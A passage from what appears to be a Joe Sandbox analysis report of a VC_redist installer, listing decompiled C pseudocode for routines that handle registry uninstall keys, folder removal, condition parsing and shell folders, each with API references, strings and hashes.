                                                                          					E00013B6A(_t45, _v8);
                                                                          					_t49 = _t49 + 1;
                                                                          					_t28 = _a8 + 0x10;
                                                                          					_push(0);
                                                                          					_a8 = _t28;
                                                                          					_pop(0);
                                                                          					if(_t49 <  *((intOrPtr*)(_t43 + 4))) {
                                                                          						continue;
                                                                          					}
                                                                          					goto L11;
                                                                          				}
                                                                          				_push("Failed to format tag folder path.");
                                                                          				goto L10;
                                                                          			}












                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001EE4A
                                                                            • Part of subcall function 00054038: SetFileAttributesW.KERNEL32(00038FFA,00000080,00000000,00038FFA,000000FF,00000000,?,?,00038FFA), ref: 00054067
                                                                            • Part of subcall function 00054038: GetLastError.KERNEL32(?,?,00038FFA), ref: 00054071
                                                                            • Part of subcall function 00013B6A: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0001EE95,00000001,00000000,00000095,00000001,000204DA,00000095,00000000,swidtag,00000001), ref: 00013B87
                                                                          Strings
                                                                          • Failed to allocate regid folder path., xrefs: 0001EEB0
                                                                          • Failed to format tag folder path., xrefs: 0001EEB7
                                                                          • swidtag, xrefs: 0001EE59
                                                                          • Failed to allocate regid file path., xrefs: 0001EEA9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                                          • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                                          • API String ID: 1428973842-4170906717
                                                                          • Opcode ID: b2ce3fd2fbe273fc63581781cd49f39ae8c985d5ac4189e555f64dd55e5d8cd1
                                                                          • Instruction ID: dc54c4682d6bcd135f46195c42a2dd33aeaa0477c251a253a8323e8c875434c6
                                                                          • Opcode Fuzzy Hash: b2ce3fd2fbe273fc63581781cd49f39ae8c985d5ac4189e555f64dd55e5d8cd1
                                                                          • Instruction Fuzzy Hash: E5216D32D00518FBCB15EB99CC42ADEBBF5EF44711F14C0A6F914AA1A2D7319E909B50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 69%
                                                                          			E00038B73(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t41;
                                                                          				intOrPtr _t47;
                                                                          				void* _t49;
                                                                          				void* _t50;
                                                                          
                                                                          				_t42 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t49 = E00050E3F((0 | _a4 != 0x00000000) + 0x80000001, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0x20019,  &_v12);
                                                                          				if(_t49 == 0x80070003 || _t49 == 0x80070002) {
                                                                          					L11:
                                                                          					_t50 = 0;
                                                                          				} else {
                                                                          					if(_t49 >= 0) {
                                                                          						_t41 = 0;
                                                                          						_t50 = E00050D1C(_t42, _v12, 0,  &_v8);
                                                                          						if(_t50 == 0x80070103) {
                                                                          							goto L11;
                                                                          						} else {
                                                                          							_t47 = _a8;
                                                                          							while(_t50 >= 0) {
                                                                          								if(CompareStringW(0, 1, _v8, 0xffffffff,  *(_t47 + 0x10), 0xffffffff) != 2) {
                                                                          									E000388CF(_t42, _a4, _v12, _v8, _t47, _a12);
                                                                          								}
                                                                          								_t41 = _t41 + 1;
                                                                          								_t50 = E00050D1C(_t42, _v12, _t41,  &_v8);
                                                                          								if(_t50 != 0x80070103) {
                                                                          									continue;
                                                                          								} else {
                                                                          									goto L11;
                                                                          								}
                                                                          								goto L12;
                                                                          							}
                                                                          							_push("Failed to enumerate uninstall key for related bundles.");
                                                                          							goto L4;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to open uninstall registry key.");
                                                                          						L4:
                                                                          						_push(_t50);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				L12:
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					RegCloseKey(_v12);
                                                                          				}
                                                                          				return _t50;
                                                                          			}










                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00038BF7
                                                                          • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0001F66B,00000001,00000100,000001B4,00000000), ref: 00038C45
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00038B94
                                                                          • Failed to enumerate uninstall key for related bundles., xrefs: 00038C56
                                                                          • Failed to open uninstall registry key., xrefs: 00038BBA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCompareOpenString
                                                                          • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 2817536665-2531018330
                                                                          • Opcode ID: 3f0bf89bd98be38d03d6b7306ef93666c32137fdedf2ff0f5d705b5f63a0f5da
                                                                          • Instruction ID: 5c3bdb3717d4bbfeb7368f666864eca59b4b6d1102c84d0dcee5f0d20d13652c
                                                                          • Opcode Fuzzy Hash: 3f0bf89bd98be38d03d6b7306ef93666c32137fdedf2ff0f5d705b5f63a0f5da
                                                                          • Instruction Fuzzy Hash: 5C219436911219BBDF226B94CC46FEEBA7DEB00361F2485A4F91066091DB751E90D7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 31%
                                                                          			E0003D047(void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				intOrPtr _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr _v16;
                                                                          				char _v20;
                                                                          				signed int _t31;
                                                                          				intOrPtr _t33;
                                                                          				signed int _t45;
                                                                          				signed int* _t46;
                                                                          				signed int* _t49;
                                                                          				signed int _t51;
                                                                          				intOrPtr _t52;
                                                                          				signed int* _t53;
                                                                          				intOrPtr _t54;
                                                                          
                                                                          				_t53 = _a8;
                                                                          				_t45 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t51 =  *_t53;
                                                                          				_t49 = E000138D4(_t51 << 2, 1);
                                                                          				_a8 = _t49;
                                                                          				if(_t49 != 0) {
                                                                          					_t31 = 0;
                                                                          					if( *_t53 > 0) {
                                                                          						_t4 =  &(_t53[1]); // 0x4
                                                                          						_t46 = _t4;
                                                                          						do {
                                                                          							 *(_t49 + _t31 * 4) = _t46;
                                                                          							_t31 = _t31 + 1;
                                                                          							_t46 =  &(_t46[0x83]);
                                                                          						} while (_t31 <  *_t53);
                                                                          					}
                                                                          					_v20 = 3;
                                                                          					_v16 = 2;
                                                                          					_v12 = _t51;
                                                                          					_v8 = _t49;
                                                                          					_t33 = _a12( &_v20, _a16);
                                                                          					_t52 = _a4;
                                                                          					_t54 = _t33;
                                                                          					WaitForSingleObject( *(_t52 + 0xc), 0xffffffff);
                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)) + 0x424)) = _t45;
                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)) + 0x428)) = _t54;
                                                                          					if(_t54 == 2) {
                                                                          						 *((char*)( *((intOrPtr*)(_t52 + 0x10)) + 2)) = 1;
                                                                          						 *((char*)( *((intOrPtr*)(_t52 + 0x10)) + 3)) = 1;
                                                                          					}
                                                                          					ReleaseMutex( *(_t52 + 0xc));
                                                                          					SetEvent( *(_t52 + 8));
                                                                          					E00013999(_a8);
                                                                          				} else {
                                                                          					_t45 = 0x8007000e;
                                                                          					E000137D3(_t30, "NetFxChainer.cpp", 0xe4, 0x8007000e);
                                                                          					_push("Failed to allocate buffer.");
                                                                          					_push(0x8007000e);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t45;
                                                                          			}

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003D0DC
                                                                          • ReleaseMutex.KERNEL32(?), ref: 0003D10A
                                                                          • SetEvent.KERNEL32(?), ref: 0003D113
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                          • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                          • API String ID: 944053411-3611226795
                                                                          • Opcode ID: 04f7ef6a1327119364b89511b06547097259b5f2c5d39dc911c86a1df473d6e9
                                                                          • Instruction ID: e51cb2424b2b41d4d59708693e213b327ebd95d824ec8c68caae7bba06f7c758
                                                                          • Opcode Fuzzy Hash: 04f7ef6a1327119364b89511b06547097259b5f2c5d39dc911c86a1df473d6e9
                                                                          • Instruction Fuzzy Hash: F821B5B5A0070ABFDB109F68DC45A9AB7F9FF08314F108629F924A7252C775E951CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 65%
                                                                          			E000196F4(void* __edx, void* __edi, int _a4, intOrPtr _a8) {
                                                                          				void* _t12;
                                                                          				void* _t19;
                                                                          				void* _t22;
                                                                          				int _t26;
                                                                          				void* _t27;
                                                                          				signed int _t28;
                                                                          				void* _t33;
                                                                          				void* _t34;
                                                                          				void* _t37;
                                                                          
                                                                          				_t33 = __edi;
                                                                          				_t26 = _a4;
                                                                          				_t12 =  *((intOrPtr*)(_t26 + 0x10)) - 0x10;
                                                                          				if(_t12 == 0) {
                                                                          					L8:
                                                                          					_push(_t33);
                                                                          					_t8 = _t26 + 0x18; // 0x18
                                                                          					_t34 = _t8;
                                                                          					E00031664(_a8, 0x18, _t34, 0x18);
                                                                          					_t28 = 6;
                                                                          					memset(_t34, 0, _t28 << 2);
                                                                          					goto L9;
                                                                          				} else {
                                                                          					_t19 = _t12 - 1;
                                                                          					if(_t19 == 0) {
                                                                          						_t37 = E00017410(_t27, __edx,  *_t26,  *(_t26 + 0x18), _a8);
                                                                          						if(_t37 == 0x80070490 || _t37 >= 0) {
                                                                          							L9:
                                                                          							_t37 = E00018E48(_t26);
                                                                          							if(_t37 < 0) {
                                                                          								_push("Failed to read next symbol.");
                                                                          								goto L11;
                                                                          							}
                                                                          						} else {
                                                                          							E000137D3(_t20, "condition.cpp", 0x1b8, _t37);
                                                                          							_push("Failed to find variable.");
                                                                          							L11:
                                                                          							_push(_t37);
                                                                          							E0005012F();
                                                                          						}
                                                                          					} else {
                                                                          						_t22 = _t19 - 1;
                                                                          						if(_t22 == 0) {
                                                                          							goto L8;
                                                                          						} else {
                                                                          							_t23 = _t22 == 1;
                                                                          							if(_t22 == 1) {
                                                                          								goto L8;
                                                                          							} else {
                                                                          								_t37 = 0x8007000d;
                                                                          								 *((intOrPtr*)(_t26 + 0x30)) = 1;
                                                                          								E000137D3(_t23, "condition.cpp", 0x1c7, 0x8007000d);
                                                                          								_push( *((intOrPtr*)(_t26 + 0x14)));
                                                                          								E0005012F(0x8007000d, "Failed to parse condition \'%ls\' at position: %u",  *((intOrPtr*)(_t26 + 4)));
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t37;
                                                                          			}

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: _memcpy_s
                                                                          • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                          • API String ID: 2001391462-1605196437
                                                                          • Opcode ID: 7d97afb78a2e4ecae0fbf6a8f7cffc06334ef0b0427030ea5ee9de41fe06da1e
                                                                          • Instruction ID: c48fdf60efd266aa0f6fd9dffdf53c6569a07c40cc5304fc683890a83b449c49
                                                                          • Opcode Fuzzy Hash: 7d97afb78a2e4ecae0fbf6a8f7cffc06334ef0b0427030ea5ee9de41fe06da1e
                                                                          • Instruction Fuzzy Hash: 2311E7326942207BDB652DA8DC9BEEF3A54DF05720F044066FE046E1D3C6A2D99482E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 30%
                                                                          			E00058803(void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
                                                                          				signed int _v8;
                                                                          				struct _SYSTEMTIME _v24;
                                                                          				char _v28;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t11;
                                                                          				signed short _t21;
                                                                          				void* _t22;
                                                                          				signed short _t24;
                                                                          				struct _FILETIME* _t25;
                                                                          				void* _t29;
                                                                          				char* _t30;
                                                                          				signed int _t38;
                                                                          
                                                                          				_t29 = __edx;
                                                                          				_t11 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t11 ^ _t38;
                                                                          				_t30 =  &(_v24.wMonth);
                                                                          				_t25 = _a8;
                                                                          				_v24.wYear = 0;
                                                                          				_t31 = 0;
                                                                          				asm("stosd");
                                                                          				_push(0);
                                                                          				_v28 = 0x10;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosw");
                                                                          				_push( &_v28);
                                                                          				_push( &_v24);
                                                                          				_push(0x4000000b);
                                                                          				_push(_a4);
                                                                          				if( *0x7a988() != 0) {
                                                                          					if(SystemTimeToFileTime( &_v24, _t25) == 0) {
                                                                          						_t21 = GetLastError();
                                                                          						_t34 =  <=  ? _t21 : _t21 & 0x0000ffff | 0x80070000;
                                                                          						_t22 = 0x80004005;
                                                                          						_t31 =  >=  ? 0x80004005 :  <=  ? _t21 : _t21 & 0x0000ffff | 0x80070000;
                                                                          						_push( >=  ? 0x80004005 :  <=  ? _t21 : _t21 & 0x0000ffff | 0x80070000);
                                                                          						_push(0x37);
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_t24 = GetLastError();
                                                                          					_t37 =  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
                                                                          					_t22 = 0x80004005;
                                                                          					_t31 =  >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
                                                                          					_push( >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000);
                                                                          					_push(0x32);
                                                                          					L4:
                                                                          					_push("inetutil.cpp");
                                                                          					E000137D3(_t22);
                                                                          				}
                                                                          				return E0003DE36(_t25, _v8 ^ _t38, _t29, _t30, _t31);
                                                                          			}



















                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 0005884C
                                                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00058874
                                                                          • GetLastError.KERNEL32 ref: 0005887E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastTime$FileSystem
                                                                          • String ID: @Met$inetutil.cpp
                                                                          • API String ID: 1528435940-2500885081
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 53%
                                                                          			E00019D03(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				void* _t32;
                                                                          				char _t33;
                                                                          
                                                                          				_t30 = _a4;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				if(E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0) >= 0) {
                                                                          					_t32 = E00054932(_v8,  &_v12,  &_v16);
                                                                          					if(_t32 == 0x80070002 || _t32 == 0x80070003) {
                                                                          						_push(_v8);
                                                                          						E0005061A(2, "File search: %ls, did not find path: %ls",  *_t30);
                                                                          						_t33 = 0;
                                                                          					} else {
                                                                          						if(_t32 >= 0) {
                                                                          							_t33 = E000181D8(_a8,  *((intOrPtr*)(_t30 + 4)), _v16, _v12, 0);
                                                                          							if(_t33 < 0) {
                                                                          								_push("Failed to set variable.");
                                                                          								goto L2;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed get file version.");
                                                                          							goto L2;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to format path string.");
                                                                          					L2:
                                                                          					_push(_t33);
                                                                          					E0005012F();
                                                                          				}
                                                                          				E00012793(_v8);
                                                                          				return _t33;
                                                                          			}









                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019D25
                                                                          Strings
                                                                          • Failed to set variable., xrefs: 00019D84
                                                                          • Failed to format path string., xrefs: 00019D30
                                                                          • File search: %ls, did not find path: %ls, xrefs: 00019D90
                                                                          • Failed get file version., xrefs: 00019D65
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16
                                                                          • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                          • API String ID: 3613110473-2458530209
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00011209(void* __ecx, intOrPtr _a4, intOrPtr* _a8, short*** _a12) {
                                                                          				int _v8;
                                                                          				int _v12;
                                                                          				PWCHAR* _t21;
                                                                          				signed short _t24;
                                                                          				void* _t35;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_t35 = E00011EF2( &_v8, L"ignored ", 0);
                                                                          				if(_t35 >= 0) {
                                                                          					_t35 = E00011EF2( &_v8, _a4, 0);
                                                                          					if(_t35 >= 0) {
                                                                          						_t21 = CommandLineToArgvW(_v8,  &_v12);
                                                                          						if(_t21 != 0) {
                                                                          							_t8 =  &(_t21[1]); // 0x4
                                                                          							 *_a12 = _t8;
                                                                          							 *_a8 = _v12 - 1;
                                                                          						} else {
                                                                          							_t24 = GetLastError();
                                                                          							_t39 =  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
                                                                          							_t35 =  >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "apputil.cpp", 0x63, _t35);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t35;
                                                                          			}









                                                                          APIs
                                                                          • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00015137,00000000,?), ref: 00011247
                                                                          • GetLastError.KERNEL32(?,?,?,00015137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00011251
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ArgvCommandErrorLastLine
                                                                          • String ID: @Met$apputil.cpp$ignored
                                                                          • API String ID: 3459693003-3465840003
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 24%
                                                                          			E00019908(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _t25;
                                                                          				void* _t29;
                                                                          				void* _t30;
                                                                          
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t29 = E0005388A(_a8, L"Condition",  &_v12);
                                                                          				if(_t29 != 1) {
                                                                          					if(_t29 >= 0) {
                                                                          						_t30 = E000533C8(_v12,  &_v8);
                                                                          						if(_t30 >= 0) {
                                                                          							_t30 = E000121A5(_a4, _v8, 0);
                                                                          							if(_t30 < 0) {
                                                                          								_push("Failed to copy condition string from BSTR");
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to get Condition inner text.");
                                                                          							goto L8;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to select condition node.");
                                                                          						L8:
                                                                          						_push(_t30);
                                                                          						E0005012F();
                                                                          					}
                                                                          				} else {
                                                                          					_t30 = 0;
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					__imp__#6(_v8);
                                                                          				}
                                                                          				_t25 = _v12;
                                                                          				if(_t25 != 0) {
                                                                          					 *((intOrPtr*)( *_t25 + 8))(_t25);
                                                                          				}
                                                                          				return _t30;
                                                                          			}









                                                                          APIs
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0001997F
                                                                          Strings
                                                                          • Failed to select condition node., xrefs: 00019936
                                                                          • Failed to get Condition inner text., xrefs: 0001994F
                                                                          • Failed to copy condition string from BSTR, xrefs: 00019969
                                                                          • Condition, xrefs: 0001991A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeString
                                                                          • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.
                                                                          • API String ID: 3341692771-3600577998
                                                                          • Opcode ID: 585e591e49a60a17f4753af866c5a29047f0bba0161620c45b565dff25e63279
                                                                          • Instruction ID: 5e4b287d451bb19e22ca599b33c36adea8b7c10daae79ceeb8c3b712b95c1393
                                                                          • Opcode Fuzzy Hash: 585e591e49a60a17f4753af866c5a29047f0bba0161620c45b565dff25e63279
                                                                          • Instruction Fuzzy Hash: 1311A932D50228BBDB259A94CD15FEEBB68AF00752F10419EFC01BA150DB719F94D7C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 53%
                                                                          			E00015D71(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t29;
                                                                          				void* _t31;
                                                                          
                                                                          				_t29 = __edx;
                                                                          				_t26 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				E000509BB(_t26, GetCurrentProcess(),  &_v12);
                                                                          				if(_v12 != 0) {
                                                                          					_t31 = E00015BF0(_t26, _a4,  &_v8);
                                                                          					if(_t31 >= 0) {
                                                                          						goto L5;
                                                                          					} else {
                                                                          						_push("Failed to get 64-bit folder.");
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					_t31 = E00053BF7(__ebx, _t26, _t29,  &_v8, _a4);
                                                                          					if(_t31 >= 0) {
                                                                          						L5:
                                                                          						_t31 = E000302F4(_a8, _v8, 0);
                                                                          						if(_t31 < 0) {
                                                                          							_push("Failed to set variant value.");
                                                                          							goto L7;
                                                                          						}
                                                                          					} else {
                                                                          						E000137D3(_t23, "variable.cpp", 0x86e, _t31);
                                                                          						_push("Failed to get shell folder.");
                                                                          						L7:
                                                                          						_push(_t31);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t31;
                                                                          			}








                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00015D83
                                                                            • Part of subcall function 000509BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00015D8F,00000000), ref: 000509CF
                                                                            • Part of subcall function 000509BB: GetProcAddress.KERNEL32(00000000), ref: 000509D6
                                                                            • Part of subcall function 000509BB: GetLastError.KERNEL32(?,?,?,00015D8F,00000000), ref: 000509ED
                                                                            • Part of subcall function 00053BF7: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00053C24
                                                                          Strings
                                                                          • Failed to get shell folder., xrefs: 00015DB7
                                                                          • Failed to get 64-bit folder., xrefs: 00015DCD
                                                                          • variable.cpp, xrefs: 00015DAD
                                                                          • Failed to set variant value., xrefs: 00015DE7
                                                                          Memory Dump Source
